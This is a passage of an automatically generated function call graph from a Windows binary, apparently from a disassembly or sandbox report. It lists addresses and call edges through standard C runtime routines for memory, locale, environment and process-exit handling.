92f517 13563->13565 13564->13567 13566 92f510 13565->13566 13568 92f529 FreeLibrary 13565->13568 13566->13560 13566->13561 13567->13563 13567->13566 13569 92f4e6 LoadLibraryExW 13567->13569 13568->13566 13569->13565 13569->13567 13576 928f43 13570->13576 13587 92e8d4 GetLastError 13573->13587 13575 92ad72 13575->13542 13577 928f4f ___scrt_is_nonwritable_in_current_image 13576->13577 13582 92b750 EnterCriticalSection 13577->13582 13579 928f5a std::locale::_Setgloballocale 13583 928f91 13579->13583 13582->13579 13586 92b767 LeaveCriticalSection 13583->13586 13585 928f13 13585->13543 13586->13585 13588 92e8f0 13587->13588 13589 92e8ea 13587->13589 13591 92f1da __dosmaperr 6 API calls 13588->13591 13593 92e8f4 SetLastError 13588->13593 13590 92f19b __dosmaperr 6 API calls 13589->13590 13590->13588 13592 92e90c 13591->13592 13592->13593 13595 92f807 __dosmaperr 12 API calls 13592->13595 13593->13575 13596 92e921 13595->13596 13597 92e93a 13596->13597 13598 92e929 13596->13598 13599 92f1da __dosmaperr 6 API calls 13597->13599 13600 92f1da __dosmaperr 6 API calls 13598->13600 13602 92e946 13599->13602 13601 92e937 13600->13601 13606 92e4f7 ___free_lconv_mon 12 API calls 13601->13606 13603 92e961 13602->13603 13604 92e94a 13602->13604 13607 92ea94 __dosmaperr 12 API calls 13603->13607 13605 92f1da __dosmaperr 6 API calls 13604->13605 13605->13601 13606->13593 13608 92e96c 13607->13608 13609 92e4f7 ___free_lconv_mon 12 API calls 13608->13609 13609->13593 13611 92ec06 ___scrt_is_nonwritable_in_current_image 13610->13611 13624 92b750 EnterCriticalSection 13611->13624 13613 92ec10 13625 92ec40 13613->13625 13616 92ec4c 13617 92ec58 ___scrt_is_nonwritable_in_current_image 13616->13617 13629 92b750 EnterCriticalSection 13617->13629 13619 92ec62 13630 92ea49 13619->13630 13621 92ec7a 13634 92ec9a 13621->13634 13624->13613 13628 92b767 LeaveCriticalSection 13625->13628 13627 92eb02 13627->13616 13628->13627 13629->13619 13631 92ea58 __Getctype 13630->13631 13633 92ea7f __Getctype 13630->13633 13631->13633 13637 931e7b 13631->13637 13633->13621 13751 92b767 LeaveCriticalSection 13634->13751 13636 92e81b 13636->13516 13638 931e91 13637->13638 13640 931efb 13637->13640 13638->13640 13643 931ec4 13638->13643 13648 92e4f7 ___free_lconv_mon 14 API calls 13638->13648 13641 92e4f7 ___free_lconv_mon 14 API calls 13640->13641 13664 931f49 13640->13664 13642 931f1d 13641->13642 13644 92e4f7 ___free_lconv_mon 14 API calls 13642->13644 13645 931ee6 13643->13645 13650 92e4f7 ___free_lconv_mon 14 API calls 13643->13650 13646 931f30 13644->13646 13647 92e4f7 ___free_lconv_mon 14 API calls 13645->13647 13649 92e4f7 ___free_lconv_mon 14 API calls 13646->13649 13651 931ef0 13647->13651 13653 931eb9 13648->13653 13654 931f3e 13649->13654 13655 931edb 13650->13655 13656 92e4f7 ___free_lconv_mon 14 API calls 13651->13656 13652 931fb7 13657 92e4f7 ___free_lconv_mon 14 API calls 13652->13657 13665 9312dd 13653->13665 13659 92e4f7 ___free_lconv_mon 14 API calls 13654->13659 13693 9315f8 13655->13693 13656->13640 13662 931fbd 13657->13662 13659->13664 13661 92e4f7 14 API calls ___free_lconv_mon 13663 931f57 13661->13663 13662->13633 13663->13652 13663->13661 13705 932015 13664->13705 13666 9312ee 13665->13666 13692 9313d7 13665->13692 13667 9312ff 13666->13667 13668 92e4f7 ___free_lconv_mon 14 API calls 13666->13668 13669 931311 13667->13669 13670 92e4f7 ___free_lconv_mon 14 API calls 13667->13670 13668->13667 13671 931323 13669->13671 13673 92e4f7 ___free_lconv_mon 14 API calls 13669->13673 13670->13669 13672 931335 13671->13672 13674 92e4f7 ___free_lconv_mon 14 API calls 13671->13674 13675 931347 13672->13675 13676 92e4f7 ___free_lconv_mon 14 API calls 13672->13676 13673->13671 13674->13672 13677 92e4f7 ___free_lconv_mon 14 API calls 13675->13677 13678 931359 13675->13678 13676->13675 13677->13678 13692->13643 13694 931605 13693->13694 13704 93165d 13693->13704 13695 931615 13694->13695 13696 92e4f7 ___free_lconv_mon 14 API calls 13694->13696 13697 931627 13695->13697 13698 92e4f7 ___free_lconv_mon 14 API calls 13695->13698 13696->13695 13699 92e4f7 ___free_lconv_mon 14 API calls 13697->13699 13700 931639 13697->13700 13698->13697 13699->13700 13701 93164b 13700->13701 13702 92e4f7 ___free_lconv_mon 14 API calls 13700->13702 13703 92e4f7 ___free_lconv_mon 14 API calls 13701->13703 13701->13704 13702->13701 13703->13704 13704->13645 13706 932041 13705->13706 13707 932022 13705->13707 13706->13663 13707->13706 13711 9316dc 13707->13711 13710 92e4f7 ___free_lconv_mon 14 API calls 13710->13706 13712 9317ba 13711->13712 13713 9316ed 13711->13713 13712->13710 13747 931a3c 13713->13747 13716 931a3c __Getctype 14 API calls 13717 931700 13716->13717 13748 931a4e 13747->13748 13749 9316f5 13748->13749 13750 92e4f7 ___free_lconv_mon 14 API calls 13748->13750 13749->13716 13750->13748 13751->13636 13788 930b4f 13752->13788 13755 9308f3 13758 9308ff ___scrt_is_nonwritable_in_current_image 13755->13758 13756 92e8d4 __dosmaperr 14 API calls 13765 930930 std::locale::_Setgloballocale 13756->13765 13757 93094f 13760 92ad6d __dosmaperr 14 API calls 13757->13760 13758->13756 13758->13757 13759 930961 std::locale::_Setgloballocale 13758->13759 13758->13765 13761 930997 std::locale::_Setgloballocale 13759->13761 13802 92b750 EnterCriticalSection 13759->13802 13762 930954 13760->13762 13767 930ad1 13761->13767 13768 9309d4 13761->13768 13778 930a02 13761->13778 13799 92b458 13762->13799 13765->13757 13765->13759 13781 930939 13765->13781 13770 930adc 13767->13770 13807 92b767 LeaveCriticalSection 13767->13807 13773 92e783 __Getctype 39 API calls 13768->13773 13768->13778 13772 928bec std::locale::_Setgloballocale 21 API calls 13770->13772 13774 930ae4 13772->13774 13776 9309f7 13773->13776 13775 92e783 __Getctype 39 API calls 13779 930a57 13775->13779 13777 92e783 __Getctype 39 API calls 13776->13777 13777->13778 13803 930a7d 13778->13803 13780 92e783 __Getctype 39 API calls 13779->13780 13779->13781 13780->13781 13781->13520 13783 92b4d5 __fread_nolock std::locale::_Setgloballocale 13782->13783 13784 92b501 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 13783->13784 13787 92b5d2 std::locale::_Setgloballocale 13784->13787 13786 92b5f0 13786->13527 13855 9229c6 13787->13855 13789 930b5b ___scrt_is_nonwritable_in_current_image 13788->13789 13794 92b750 EnterCriticalSection 13789->13794 13791 930b69 13795 930bab 13791->13795 13794->13791 13798 92b767 LeaveCriticalSection 13795->13798 13797 92b9c7 13797->13520 13797->13755 13798->13797 13808 92b6a7 13799->13808 13801 92b464 13801->13781 13802->13761 13804 930a81 13803->13804 13805 930a49 13803->13805 13854 92b767 LeaveCriticalSection 13804->13854 13805->13775 13805->13779 13805->13781 13807->13770 13809 92b6b9 _Fputc 13808->13809 13812 92b601 13809->13812 13811 92b6d1 _Fputc 13811->13801 13813 92b611 13812->13813 13816 92b618 13812->13816 13821 928af0 GetLastError 13813->13821 13818 92b626 13816->13818 13825 92b67e 13816->13825 13817 92b64d 13817->13818 13828 92b485 IsProcessorFeaturePresent 13817->13828 13818->13811 13820 92b67d 13822 928b09 13821->13822 13832 92e985 13822->13832 13826 92b6a2 13825->13826 13827 92b689 GetLastError SetLastError 13825->13827 13826->13817 13827->13817 13829 92b491 13828->13829 13830 92b4b9 std::locale::_Setgloballocale 8 API calls 13829->13830 13831 92b4a6 GetCurrentProcess TerminateProcess 13830->13831 13831->13820 13833 92e99e 13832->13833 13834 92e998 13832->13834 13835 92f1da __dosmaperr 6 API calls 13833->13835 13853 928b25 SetLastError 13833->13853 13836 92f19b __dosmaperr 6 API calls 13834->13836 13837 92e9b8 13835->13837 13836->13833 13838 92f807 __dosmaperr 14 API calls 13837->13838 13837->13853 13839 92e9c8 13838->13839 13840 92e9d0 13839->13840 13841 92e9e5 13839->13841 13843 92f1da __dosmaperr 6 API calls 13840->13843 13842 92f1da __dosmaperr 6 API calls 13841->13842 13844 92e9f1 13842->13844 13845 92e9dc 13843->13845 13846 92ea04 13844->13846 13847 92e9f5 13844->13847 13850 92e4f7 ___free_lconv_mon 14 API calls 13845->13850 13849 92ea94 __dosmaperr 14 API calls 13846->13849 13848 92f1da __dosmaperr 6 API calls 13847->13848 13848->13845 13851 92ea0f 13849->13851 13850->13853 13852 92e4f7 ___free_lconv_mon 14 API calls 13851->13852 13852->13853 13853->13816 13854->13805 13856 9229ce 13855->13856 13857 9229cf IsProcessorFeaturePresent 13855->13857 13856->13786 13859 924b7e 13857->13859 13862 924c64 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 13859->13862 13861 924c61 13861->13786 13862->13861 13864 92b277 13863->13864 13867 92b28d 13863->13867 13864->13867 13869 92b1af 13864->13869 13866 92b284 13866->13867 13886 92b37c 13866->13886 13867->13381 13870 92b1bb 13869->13870 13871 92b1b8 13869->13871 13895 93004c 13870->13895 13871->13866 13876 92b1d8 13922 92b29a 13876->13922 13877 92b1cc 13878 92e4f7 ___free_lconv_mon 14 API calls 13877->13878 13880 92b1d2 13878->13880 13880->13866 13882 92e4f7 ___free_lconv_mon 14 API calls 13883 92b1fc 13882->13883 13884 92e4f7 ___free_lconv_mon 14 API calls 13883->13884 13885 92b202 13884->13885 13885->13866 13887 92b3ed 13886->13887 13888 92b38b 13886->13888 13887->13867 13888->13887 13889 92f807 __dosmaperr 14 API calls 13888->13889 13890 92b3f1 13888->13890 13892 92e641 WideCharToMultiByte std::_Locinfo::_Locinfo_dtor 13888->13892 13894 92e4f7 ___free_lconv_mon 14 API calls 13888->13894 14185 934926 13888->14185 13889->13888 13891 92e4f7 ___free_lconv_mon 14 API calls 13890->13891 13891->13887 13892->13888 13894->13888 13896 92b1c1 13895->13896 13897 930055 13895->13897 13901 93484f GetEnvironmentStringsW 13896->13901 13944 92e83e 13897->13944 13902 934867 13901->13902 13915 92b1c6 13901->13915 13903 92e641 std::_Locinfo::_Locinfo_dtor WideCharToMultiByte 13902->13903 13904 934884 13903->13904 13905 934899 13904->13905 13906 93488e FreeEnvironmentStringsW 13904->13906 13907 92e531 __fread_nolock 15 API calls 13905->13907 13906->13915 13908 9348a0 13907->13908 13909 9348b9 13908->13909 13910 9348a8 13908->13910 13912 92e641 std::_Locinfo::_Locinfo_dtor WideCharToMultiByte 13909->13912 13911 92e4f7 ___free_lconv_mon 14 API calls 13910->13911 13913 9348ad FreeEnvironmentStringsW 13911->13913 13914 9348c9 13912->13914 13913->13915 13916 9348d0 13914->13916 13917 9348d8 13914->13917 13915->13876 13915->13877 13918 92e4f7 ___free_lconv_mon 14 API calls 13916->13918 13919 92e4f7 ___free_lconv_mon 14 API calls 13917->13919 13920 9348d6 FreeEnvironmentStringsW 13918->13920 13919->13920 13920->13915 13923 92b2af 13922->13923 13924 92f807 __dosmaperr 14 API calls 13923->13924 13925 92b2d6 13924->13925 13926 92b2e8 13925->13926 13927 92b2de 13925->13927 13929 92b345 13926->13929 13932 92f807 __dosmaperr 14 API calls 13926->13932 13933 92b354 13926->13933 13938 92b36f 13926->13938 13940 92e4f7 ___free_lconv_mon 14 API calls 13926->13940 14170 92e16c 13926->14170 13928 92e4f7 ___free_lconv_mon 14 API calls 13927->13928 13930 92b1df 13928->13930 13931 92e4f7 ___free_lconv_mon 14 API calls 13929->13931 13930->13882 13931->13930 13932->13926 14179 92b23f 13933->14179 13937 92e4f7 ___free_lconv_mon 14 API calls 13939 92b361 13937->13939 13941 92b485 __Getctype 11 API calls 13938->13941 13942 92e4f7 ___free_lconv_mon 14 API calls 13939->13942 13940->13926 13943 92b37b 13941->13943 13942->13930 13945 92e849 13944->13945 13948 92e84f 13944->13948 13946 92f19b __dosmaperr 6 API calls 13945->13946 13946->13948 13947 92f1da __dosmaperr 6 API calls 13949 92e869 13947->13949 13948->13947 13950 92e855 13948->13950 13949->13950 13953 92f807 __dosmaperr 14 API calls 13949->13953 13951 92b9c2 CallUnexpected 39 API calls 13950->13951 13952 92e85a 13950->13952 13954 92e8d3 13951->13954 13969 93040d 13952->13969 13955 92e879 13953->13955 13956 92e881 13955->13956 13957 92e896 13955->13957 13959 92f1da __dosmaperr 6 API calls 13956->13959 13958 92f1da __dosmaperr 6 API calls 13957->13958 13961 92e8a2 13958->13961 13960 92e88d 13959->13960 13964 92e4f7 ___free_lconv_mon 14 API calls 13960->13964 13962 92e8a6 13961->13962 13963 92e8b5 13961->13963 13965 92f1da __dosmaperr 6 API calls 13962->13965 13966 92ea94 __dosmaperr 14 API calls 13963->13966 13964->13950 13965->13960 13967 92e8c0 13966->13967 13968 92e4f7 ___free_lconv_mon 14 API calls 13967->13968 13968->13952 13970 930437 13969->13970 13991 930299 13970->13991 13973 930450 13973->13896 13976 930477 14005 930094 13976->14005 13977 930469 13979 92e4f7 ___free_lconv_mon 14 API calls 13977->13979 13979->13973 13981 9304af 13982 92ad6d __dosmaperr 14 API calls 13981->13982 13983 9304b4 13982->13983 13986 92e4f7 ___free_lconv_mon 14 API calls 13983->13986 13984 9304f6 13985 93053f 13984->13985 14016 9307c8 13984->14016 13989 92e4f7 ___free_lconv_mon 14 API calls 13985->13989 13986->13973 13987 9304ca 13987->13984 13990 92e4f7 ___free_lconv_mon 14 API calls 13987->13990 13989->13973 13990->13984 14024 927e1a 13991->14024 13994 9302ba GetOEMCP 13996 9302e3 13994->13996 13995 9302cc 13995->13996 13997 9302d1 GetACP 13995->13997 13996->13973 13998 92e531 13996->13998 13997->13996 13999 92e56f 13998->13999 14004 92e53f __dosmaperr 13998->14004 14000 92ad6d __dosmaperr 14 API calls 13999->14000 14002 92e56d 14000->14002 14001 92e55a RtlAllocateHeap 14001->14002 14001->14004 14002->13976 14002->13977 14003 928f08 codecvt 2 API calls 14003->14004 14004->13999 14004->14001 14004->14003 14006 930299 41 API calls 14005->14006 14007 9300b4 14006->14007 14008 9300f1 IsValidCodePage 14007->14008 14014 9301b9 14007->14014 14015 93010c __fread_nolock 14007->14015 14010 930103 14008->14010 14008->14014 14009 9229c6 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 14011 930297 14009->14011 14012 93012c GetCPInfo 14010->14012 14010->14015 14011->13981 14011->13987 14012->14014 14012->14015 14014->14009 14064 930623 14015->14064 14017 9307d4 ___scrt_is_nonwritable_in_current_image 14016->14017 14144 92b750 EnterCriticalSection 14017->14144 14019 9307de 14145 930562 14019->14145 14025 927e38 14024->14025 14026 927e31 14024->14026 14025->14026 14027 92e783 __Getctype 39 API calls 14025->14027 14026->13994 14026->13995 14028 927e59 14027->14028 14032 92ed66 14028->14032 14033 927e6f 14032->14033 14034 92ed79 14032->14034 14036 92ed93 14033->14036 14034->14033 14040 932046 14034->14040 14037 92eda6 14036->14037 14038 92edbb 14036->14038 14037->14038 14061 930039 14037->14061 14038->14026 14041 932052 ___scrt_is_nonwritable_in_current_image 14040->14041 14042 92e783 __Getctype 39 API calls 14041->14042 14043 93205b 14042->14043 14044 9320a1 14043->14044 14053 92b750 EnterCriticalSection 14043->14053 14044->14033 14046 932079 14054 9320c7 14046->14054 14051 92b9c2 CallUnexpected 39 API calls 14052 9320c6 14051->14052 14053->14046 14055 93208a 14054->14055 14056 9320d5 __Getctype 14054->14056 14058 9320a6 14055->14058 14056->14055 14057 931e7b __Getctype 14 API calls 14056->14057 14057->14055 14059 92b767 std::_Lockit::~_Lockit LeaveCriticalSection 14058->14059 14060 93209d 14059->14060 14060->14044 14060->14051 14062 92e783 __Getctype 39 API calls 14061->14062 14063 93003e 14062->14063 14063->14038 14065 93064b GetCPInfo 14064->14065 14074 930714 14064->14074 14070 930663 14065->14070 14065->14074 14067 9229c6 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 14069 9307c6 14067->14069 14069->14014 14075 92faf3 14070->14075 14074->14067 14076 927e1a __strnicoll 39 API calls 14075->14076 14077 92fb13 14076->14077 14095 92e57f 14077->14095 14079 92fbcf 14081 9229c6 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 14079->14081 14080 92fbc7 14098 9254a7 14080->14098 14084 92fbf2 14081->14084 14082 92fb40 14082->14079 14082->14080 14083 92e531 __fread_nolock 15 API calls 14082->14083 14086 92fb65 __fread_nolock __alloca_probe_16 14082->14086 14083->14086 14090 92fbf4 14084->14090 14086->14080 14087 92e57f __strnicoll MultiByteToWideChar 14086->14087 14088 92fbae 14087->14088 14088->14080 14089 92fbb5 GetStringTypeW 14088->14089 14089->14080 14102 92e5a9 14095->14102 14099 9254b1 14098->14099 14101 9254c2 14098->14101 14099->14101 14104 92c522 14099->14104 14101->14079 14103 92e59b MultiByteToWideChar 14102->14103 14103->14082 14144->14019 14155 92c20e 14145->14155 14147 930584 14148 92c20e __fread_nolock 29 API calls 14147->14148 14149 9305a3 14148->14149 14156 92c21f 14155->14156 14165 92c21b _Yarn 14155->14165 14157 92c226 14156->14157 14160 92c239 __fread_nolock 14156->14160 14158 92ad6d __dosmaperr 14 API calls 14157->14158 14159 92c22b 14158->14159 14162 92c270 14160->14162 14163 92c267 14160->14163 14160->14165 14162->14165 14167 92ad6d __dosmaperr 14 API calls 14162->14167 14164 92ad6d __dosmaperr 14 API calls 14163->14164 14165->14147 14171 92e17a 14170->14171 14172 92e188 14170->14172 14171->14172 14177 92e1a0 14171->14177 14173 92ad6d __dosmaperr 14 API calls 14172->14173 14174 92e190 14173->14174 14175 92b458 __strnicoll 29 API calls 14174->14175 14176 92e19a 14175->14176 14176->13926 14177->14176 14178 92ad6d __dosmaperr 14 API calls 14177->14178 14178->14174 14180 92b24c 14179->14180 14184 92b269 14179->14184 14181 92b263 14180->14181 14183 92e4f7 ___free_lconv_mon 14 API calls 14180->14183 14182 92e4f7 ___free_lconv_mon 14 API calls 14181->14182 14182->14184 14183->14180 14184->13937 14186 934931 14185->14186 14187 934942 14186->14187 14189 934955 ___from_strstr_to_strchr 14186->14189 14188 92ad6d __dosmaperr 14 API calls 14187->14188 14198 934947 14188->14198 14190 934b6c 14189->14190 14191 934975 14189->14191 14192 92ad6d __dosmaperr 14 API calls 14190->14192 14248 934b91 14191->14248 14194 934b71 14192->14194 14196 92e4f7 ___free_lconv_mon 14 API calls 14194->14196 14196->14198 14197 9349b9 14234 9349a5 14197->14234 14252 934bab 14197->14252 14198->13888 14199 9349bb 14203 92f807 __dosmaperr 14 API calls 14199->14203 14199->14234 14201 934997 14208 9349a0 14201->14208 14209 9349b4 14201->14209 14205 9349c9 14203->14205 14204 92e4f7 ___free_lconv_mon 14 API calls 14204->14198 14207 92e4f7 ___free_lconv_mon 14 API calls 14205->14207 14206 934a2e 14211 92e4f7 ___free_lconv_mon 14 API calls 14206->14211 14212 9349d4 14207->14212 14213 92ad6d __dosmaperr 14 API calls 14208->14213 14210 934b91 39 API calls 14209->14210 14210->14197 14219 934a36 14211->14219 14212->14197 14217 92f807 __dosmaperr 14 API calls 14212->14217 14212->14234 14213->14234 14214 934a79 14215 933f46 std::ios_base::_Init 32 API calls 14214->14215 14214->14234 14216 934aa7 14215->14216 14218 92e4f7 ___free_lconv_mon 14 API calls 14216->14218 14221 9349f0 14217->14221 14224 934a63 14218->14224 14219->14224 14256 933f46 14219->14256 14220 934b61 14222 92e4f7 ___free_lconv_mon 14 API calls 14220->14222 14225 92e4f7 ___free_lconv_mon 14 API calls 14221->14225 14222->14198 14224->14220 14224->14224 14228 92f807 __dosmaperr 14 API calls 14224->14228 14224->14234 14225->14197 14226 934a5a 14227 92e4f7 ___free_lconv_mon 14 API calls 14226->14227 14227->14224 14229 934af2 14228->14229 14230 934b02 14229->14230 14231 934afa 14229->14231 14233 92e16c ___std_exception_copy 29 API calls 14230->14233 14232 92e4f7 ___free_lconv_mon 14 API calls 14231->14232 14232->14234 14235 934b0e 14233->14235 14234->14204 14236 934b86 14235->14236 14237 934b15 14235->14237 14238 92b485 __Getctype 11 API calls 14236->14238 14265 939a5c 14237->14265 14240 934b90 14238->14240 14242 934b5b 14244 92e4f7 ___free_lconv_mon 14 API calls 14242->14244 14243 934b3c 14245 92ad6d __dosmaperr 14 API calls 14243->14245 14244->14220 14249 934980 14248->14249 14250 934b9e 14248->14250 14249->14197 14249->14199 14249->14201 14280 934c00 14250->14280 14253 934bc1 14252->14253 14255 934a1e 14252->14255 14253->14255 14295 93996b 14253->14295 14255->14206 14255->14214 14257 933f53 14256->14257 14258 933f6e 14256->14258 14257->14258 14259 933f5f 14257->14259 14261 933f7d 14258->14261 14395 939604 14258->14395 14262 92ad6d __dosmaperr 14 API calls 14259->14262 14402 93757c 14261->14402 14264 933f64 __fread_nolock 14262->14264 14264->14226 14414 92f7c8 14265->14414 14270 939acf 14273 92e4f7 ___free_lconv_mon 14 API calls 14270->14273 14275 939adb 14270->14275 14271 92f7c8 39 API calls 14272 939aac 14271->14272 14274 927f14 17 API calls 14272->14274 14273->14275 14277 939ab9 14274->14277 14276 92e4f7 ___free_lconv_mon 14 API calls 14275->14276 14278 934b36 14275->14278 14276->14278 14277->14270 14279 939ac3 SetEnvironmentVariableW 14277->14279 14278->14242 14278->14243 14279->14270 14281 934c13 14280->14281 14282 934c0e 14280->14282 14283 92f807 __dosmaperr 14 API calls 14281->14283 14282->14249 14284 934c30 14283->14284 14285 934c9e 14284->14285 14288 934ca3 14284->14288 14291 92f807 __dosmaperr 14 API calls 14284->14291 14292 92e4f7 ___free_lconv_mon 14 API calls 14284->14292 14293 92e16c ___std_exception_copy 29 API calls 14284->14293 14294 934c8d 14284->14294 14286 92b9c2 CallUnexpected 39 API calls 14285->14286 14286->14288 14287 92e4f7 ___free_lconv_mon 14 API calls 14287->14282 14289 92b485 __Getctype 11 API calls 14288->14289 14290 934caf 14289->14290 14291->14284 14292->14284 14293->14284 14294->14287 14296 939979 14295->14296 14297 93997f 14295->14297 14300 93a0b3 14296->14300 14301 93a0fb 14296->14301 14313 939994 14297->14313 14303 93a0b9 14300->14303 14304 93a0d6 14300->14304 14333 93a111 14301->14333 14306 92ad6d __dosmaperr 14 API calls 14303->14306 14308 92ad6d __dosmaperr 14 API calls 14304->14308 14312 93a0f4 14304->14312 14305 93a0c9 14305->14253 14307 93a0be 14306->14307 14309 92b458 __strnicoll 29 API calls 14307->14309 14310 93a0e5 14308->14310 14309->14305 14311 92b458 __strnicoll 29 API calls 14310->14311 14311->14305 14312->14253 14314 927e1a __strnicoll 39 API calls 14313->14314 14315 9399aa 14314->14315 14316 9399c6 14315->14316 14317 9399dd 14315->14317 14326 93998f 14315->14326 14318 92ad6d __dosmaperr 14 API calls 14316->14318 14319 9399e6 14317->14319 14320 9399f8 14317->14320 14321 9399cb 14318->14321 14323 92ad6d __dosmaperr 14 API calls 14319->14323 14324 939a05 14320->14324 14325 939a18 14320->14325 14322 92b458 __strnicoll 29 API calls 14321->14322 14322->14326 14327 9399eb 14323->14327 14328 93a111 __strnicoll 39 API calls 14324->14328 14351 93a1dc 14325->14351 14326->14253 14330 92b458 __strnicoll 29 API calls 14327->14330 14328->14326 14330->14326 14332 92ad6d __dosmaperr 14 API calls 14332->14326 14334 93a121 14333->14334 14335 93a13b 14333->14335 14336 92ad6d __dosmaperr 14 API calls 14334->14336 14337 93a143 14335->14337 14338 93a15a 14335->14338 14339 93a126 14336->14339 14340 92ad6d __dosmaperr 14 API calls 14337->14340 14341 93a166 14338->14341 14342 93a17d 14338->14342 14343 92b458 __strnicoll 29 API calls 14339->14343 14344 93a148 14340->14344 14345 92ad6d __dosmaperr 14 API calls 14341->14345 14346 927e1a __strnicoll 39 API calls 14342->14346 14349 93a131 14342->14349 14343->14349 14347 92b458 __strnicoll 29 API calls 14344->14347 14348 93a16b 14345->14348 14346->14349 14347->14349 14350 92b458 __strnicoll 29 API calls 14348->14350 14349->14305 14350->14349 14352 927e1a __strnicoll 39 API calls 14351->14352 14353 93a1ef 14352->14353 14356 93a222 14353->14356 14362 93a256 __strnicoll 14356->14362 14357 9229c6 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 14358 939a2e 14357->14358 14358->14326 14358->14332 14359 93a2d6 14361 92e57f __strnicoll MultiByteToWideChar 14359->14361 14368 93a2da 14359->14368 14360 93a4ba 14365 93a35c 14361->14365 14362->14359 14362->14360 14363 93a2c3 GetCPInfo 14362->14363 14362->14368 14363->14359 14363->14368 14364 93a4ae 14366 9254a7 __freea 14 API calls 14364->14366 14365->14364 14367 92e531 __fread_nolock 15 API calls 14365->14367 14365->14368 14369 93a383 __alloca_probe_16 14365->14369 14366->14368 14367->14369 14368->14357 14368->14360 14369->14364 14370 92e57f __strnicoll MultiByteToWideChar 14369->14370 14371 93a3cf 14370->14371 14371->14364 14372 92e57f __strnicoll MultiByteToWideChar 14371->14372 14373 93a3eb 14372->14373 14373->14364 14374 93a3f9 14373->14374 14375 93a45c 14374->14375 14377 92e531 __fread_nolock 15 API calls 14374->14377 14380 93a412 __alloca_probe_16 14374->14380 14376 9254a7 __freea 14 API calls 14375->14376 14377->14380 14380->14375 14381 92e57f __strnicoll MultiByteToWideChar 14380->14381 14396 939624 HeapSize 14395->14396 14397 93960f 14395->14397 14396->14261 14398 92ad6d __dosmaperr 14 API calls 14397->14398 14399 939614 14398->14399 14400 92b458 __strnicoll 29 API calls 14399->14400 14401 93961f 14400->14401 14401->14261 14403 937594 14402->14403 14404 937589 14402->14404 14406 93759c 14403->14406 14413 9375a5 __dosmaperr 14403->14413 14405 92e531 __fread_nolock 15 API calls 14404->14405 14411 937591 14405->14411 14407 92e4f7 ___free_lconv_mon 14 API calls 14406->14407 14407->14411 14408 9375aa 14410 92ad6d __dosmaperr 14 API calls 14408->14410 14409 9375cf HeapReAlloc 14409->14411 14409->14413 14410->14411 14411->14264 14412 928f08 codecvt 2 API calls 14412->14413 14413->14408 14413->14409 14413->14412 14415 927e1a __strnicoll 39 API calls 14414->14415 14416 92f7da 14415->14416 14418 92f7ec 14416->14418 14422 92f04d 14416->14422 14419 927f14 14418->14419 14428 927f6c 14419->14428 14425 92f5b9 14422->14425 14426 92f534 std::_Locinfo::_Locinfo_dtor 5 API calls 14425->14426 14427 92f055 14426->14427 14427->14418 14429 927f94 14428->14429 14430 927f7a 14428->14430 14432 927fba 14429->14432 14433 927f9b 14429->14433 14446 927efa 14430->14446 14434 92e57f __strnicoll MultiByteToWideChar 14432->14434 14445 927f2c 14433->14445 14450 927ebb 14433->14450 14437 927fc9 14434->14437 14436 927fd0 GetLastError 14455 92ad93 14436->14455 14437->14436 14439 927ff6 14437->14439 14442 927ebb 15 API calls 14437->14442 14440 92e57f __strnicoll MultiByteToWideChar 14439->14440 14439->14445 14443 92800d 14440->14443 14442->14439 14443->14436 14443->14445 14445->14270 14445->14271 14447 927f0d 14446->14447 14448 927f05 14446->14448 14447->14445 14449 92e4f7 ___free_lconv_mon 14 API calls 14448->14449 14449->14447 14451 927efa 14 API calls 14450->14451 14452 927ec9 14451->14452 14460 927e9c 14452->14460 14463 92ad80 14455->14463 14461 92e531 __fread_nolock 15 API calls 14460->14461 14467 9229c6 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 14466->14467 14468 9258ca 14467->14468 14468->13387 14470 928d4e 14469->14470 14479 928d5f 14469->14479 14471 924fcd std::locale::_Setgloballocale GetModuleHandleW 14470->14471 14473 928d53 14471->14473 14473->14479 14480 928c55 GetModuleHandleExW 14473->14480 14475 928c0d 14475->13358 14485 928ebb 14479->14485 14481 928c94 GetProcAddress 14480->14481 14484 928ca8 14480->14484 14481->14484 14482 928cc4 14482->14479 14483 928cbb FreeLibrary 14483->14482 14484->14482 14484->14483 14486 928ec7 ___scrt_is_nonwritable_in_current_image 14485->14486 14500 92b750 EnterCriticalSection 14486->14500 14488 928ed1 14501 928db8 14488->14501 14490 928ede 14505 928efc 14490->14505 14493 928cf0 14530 928cd7 14493->14530 14495 928cfa 14496 928d0e 14495->14496 14497 928cfe GetCurrentProcess TerminateProcess 14495->14497 14498 928c55 std::locale::_Setgloballocale 3 API calls 14496->14498 14497->14496 14499 928d16 ExitProcess 14498->14499 14500->14488 14502 928dc4 ___scrt_is_nonwritable_in_current_image std::locale::_Setgloballocale 14501->14502 14504 928e28 std::locale::_Setgloballocale 14502->14504 14508 92aa87 14502->14508 14504->14490 14529 92b767 LeaveCriticalSection 14505->14529 14507 928d97 14507->14475 14507->14493 14509 92aa93 __EH_prolog3 14508->14509 14512 92ad12 14509->14512 14511 92aaba codecvt 14511->14504 14513 92ad1e ___scrt_is_nonwritable_in_current_image 14512->14513 14520 92b750 EnterCriticalSection 14513->14520 14515 92ad2c 14521 92abdd 14515->14521 14520->14515 14522 92abf4 14521->14522 14523 92abfc 14521->14523 14525 92ad61 14522->14525 14523->14522 14524 92e4f7 ___free_lconv_mon 14 API calls 14523->14524 14524->14522 14528 92b767 LeaveCriticalSection 14525->14528 14527 92ad4a 14527->14511 14528->14527 14529->14507 14533 930f55 14530->14533 14532 928cdc std::locale::_Setgloballocale 14532->14495 14534 930f64 std::locale::_Setgloballocale 14533->14534 14535 930f71 14534->14535 14537 92f3e7 14534->14537 14535->14532 14538 92f534 std::_Locinfo::_Locinfo_dtor 5 API calls 14537->14538 14539 92f403 14538->14539 14539->14535 14541 928697 14540->14541 14544 9286a9 ___scrt_uninitialize_crt 14540->14544 14542 9286a5 14541->14542 14545 92bbb9 14541->14545 14542->13396 14544->13396 14548 92bce4 14545->14548 14551 92bdbd 14548->14551 14552 92bdc9 ___scrt_is_nonwritable_in_current_image 14551->14552 14559 92b750 EnterCriticalSection 14552->14559 14554 